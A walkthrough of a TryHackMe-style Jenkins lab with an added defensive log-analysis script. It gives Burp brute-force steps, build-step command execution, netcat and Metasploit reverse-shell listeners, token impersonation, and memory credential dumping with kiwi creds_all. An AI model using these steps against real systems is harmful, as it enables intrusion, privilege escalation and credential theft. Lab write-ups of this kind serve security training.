We will start off by enumerating the provided host for common web ports (80, 8080, 443) using the browser.
Port 80 returns a relatively empty web page:
Port 8080 returns a Jenkins login page
Port 443 returns nothing. Let’s focus on the login form. When submitting credentials, you’ll notice the application throws an error: Invalid username or password
Let’s use that error to set up a brute-force attack. You can use Hydra if you’d like, but I’m going to show you how to do it with Burp.
Intercept the login request and send it to Intruder.
Select “Cluster bomb” as your attack type.
Modify the Referer header to point to http://10.10.170.185:8080/login
Select the j_username and j_password parameter values and click the “Add” button.
In the “Payloads” tab:
Set payload 1 as a simple list and add your user list (I used a common credential list).
Set payload 2 as a simple list and add your password list.
In the “Options” tab:
Under “Grep - Match”, add your error string.
Change “Follow redirections” to “Always”.
Start the attack.
When the attack is complete, you should see a 200 response with the Grep match box unchecked for one set of creds. Let’s use those to log in.
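From the defender’s side, a run like the one above leaves a distinctive trace in the web server’s access log: a burst of POSTs to the login form from one client that all re-render the error page, followed by a redirect once a pair works. The following is an added example (mine, not part of the original write-up) that flags that pattern over constructed sample log lines; it assumes combined-format access logs, that a failed submission re-renders the form with a 200, and that a successful one answers with a 302 redirect.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined-log-style line: client IP, timestamp, request line, status; remaining fields ignored.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# Constructed sample (not from the lab): 10.0.0.7 hammers the form, then gets a redirect.
SAMPLE_LOG = """\
10.0.0.7 - - [10/Mar/2021:12:00:01 +0000] "POST /login HTTP/1.1" 200 3120
10.0.0.7 - - [10/Mar/2021:12:00:02 +0000] "POST /login HTTP/1.1" 200 3120
10.0.0.7 - - [10/Mar/2021:12:00:02 +0000] "POST /login HTTP/1.1" 200 3120
10.0.0.9 - - [10/Mar/2021:12:00:03 +0000] "GET /static/style.css HTTP/1.1" 200 880
10.0.0.7 - - [10/Mar/2021:12:00:03 +0000] "POST /login HTTP/1.1" 200 3120
10.0.0.7 - - [10/Mar/2021:12:00:04 +0000] "POST /login HTTP/1.1" 200 3120
10.0.0.7 - - [10/Mar/2021:12:00:05 +0000] "POST /login HTTP/1.1" 302 0
10.0.0.9 - - [10/Mar/2021:12:05:00 +0000] "POST /login HTTP/1.1" 200 3120
"""

def parse(line):
    """Return (ip, timestamp, method, path, status), or None for a line that does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m['ip'], datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z'), m['method'], m['path'], int(m['status'])

def login_bursts(lines, path='/login', threshold=5, window=timedelta(seconds=60)):
    """Map client IP -> (peak failures inside `window`, success seen after the last failure).
    Assumption: a failed submission re-renders the form (200); a successful one redirects (302)."""
    fails, successes = defaultdict(list), defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec is None or rec[2] != 'POST' or rec[3] != path:
            continue
        ip, ts, _, _, status = rec
        if status == 200:
            fails[ip].append(ts)
        elif status in (302, 303):
            successes[ip].append(ts)
    flagged = {}
    for ip, times in fails.items():
        times.sort()
        peak, start = 0, 0
        for end, ts in enumerate(times):  # sliding window over sorted failure times
            while ts - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:  # only clients that reach the threshold are reported
            flagged[ip] = (peak, any(s >= times[-1] for s in successes.get(ip, [])))
    return flagged
```

A success that follows a burst from the same client is the alert worth paging on; a burst with no success is still worth a lockout or rate limit on the login endpoint.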
While playing around with some of the features, you’ll notice that the project configuration section allows you to run arbitrary commands during a build. In this case, we’ll do a simple directory listing:
dir
Now, just click “Save”, and then “Build Now” on the left-hand side of the page.
Under permalinks, select the latest build and view the results under “Console Output”.
Sweet, it worked. Now let’s try to execute a reverse shell using the payload given by TryHackMe. First, set up an HTTP server to serve the indicated file by navigating to the scripts directory and entering the following:
python3 -m http.server 1337
Then, let’s open a different terminal and set up a netcat listener:
nc -nvlp 1338
Now, let’s go ahead and execute the given payload by putting it in the build’s command window and building the project.
Success! Now, let’s read that user.txt file. In this case, the file appears to be on Bruce’s desktop.
Now, we need to somehow escalate privileges. We can go several routes with this, but I’m going to choose the simplest: Meterpreter. So let’s create a reverse TCP shell and upload it the same way we uploaded the PowerShell file. First, let’s set up a listener in Metasploit so that we can leverage Metasploit’s features:
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.240.85
set lport 4444
exploit -j -z
Now let’s create, upload, and invoke the payload.
Got eem!
Now, we only have Bruce’s permissions. So let’s try the “getsystem” command in Meterpreter…
Alternatively, we can use incognito to escalate our privileges by using token impersonation, as indicated in the TryHackMe guide for this machine. Now, let’s migrate into a 64-bit process with SYSTEM privileges. Identify your process, identify a 64-bit SYSTEM process, then migrate:
getpid
ps
migrate 668
Perfect. So before I attempt to read the flag as indicated by TryHackMe, I’m going to see if I can get credentials from memory:
load kiwi
creds_all
After noting his password, I am now going to go ahead and drop into a shell and try to read the root flag.
Sweet! We have completed this lab. Naturally, you may want to consider doing some more post-exploitation and also see whether your discovered creds could be put to good use. As for me, I’m grabbing a beer!